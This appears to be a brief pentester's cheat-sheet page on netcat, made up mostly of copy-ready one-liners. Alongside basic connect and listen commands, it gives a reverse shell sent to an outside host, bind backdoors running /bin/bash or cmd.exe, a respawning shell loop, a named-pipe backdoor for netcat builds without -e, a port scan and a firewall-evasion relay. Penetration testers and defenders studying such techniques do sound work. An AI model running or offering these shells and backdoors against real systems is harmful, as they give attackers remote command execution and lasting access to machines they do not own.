Netcat
Netcat rocks my socks

Basics

Connect to a socket on host 192.168.1.1 on TCP port 81
1
nc 192.168.1.1 81
Copied!
Listen on the local machine for inbound TCP connections on port 81
1
nc -nvlp 81
Copied!
Reverse shell sent to host 10.0.0.2 over TCP port 53
1
nc 10.0.0.2 53 -e /bin/bash
Copied!
Backdoor listening on TCP 80 set to execute cmd.exe when connected
1
nc -nvlp 80 -e cmd.exe
Copied!

More Fancy

Attempt to connect to each port from 10-90 on 10.0.0.1, don't resolve any names -n, don't send any data -z, and only wait 1 second for a connection -w1
1
nc -nvzw1 10.0.0.1 10-90
Copied!
Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash true loop is an easy way to work around this, use nohup also!
1
while [ 1 ]; do echo β€œstarted”; nc -l -p 1234 -e /bin/sh; done
Copied!
Netcat relay used to forward everything received by the host on TCP 4321 sent to 10.0.0.1 on TCP 8123
1
nc -l -p 4321 | nc 10.0.0.1 8123
Copied!
Create a netcat backdoor without -e support. This generates a named pipe which is used to funnel data between bash and nc.
1
mknod backpipe p
2
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
Copied!

Firewall Evasion

If a specific port is blocked at the firewall, netcat can be used to pipe through authorized ports. Using the named pipe we can pipe the data thru to the nc output
1
mknod mypipe p
2
nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
3
ssh [email protected] -p 80 # Attcker command to connect to ssh piped thru port 80
Copied!
Last modified 9mo ago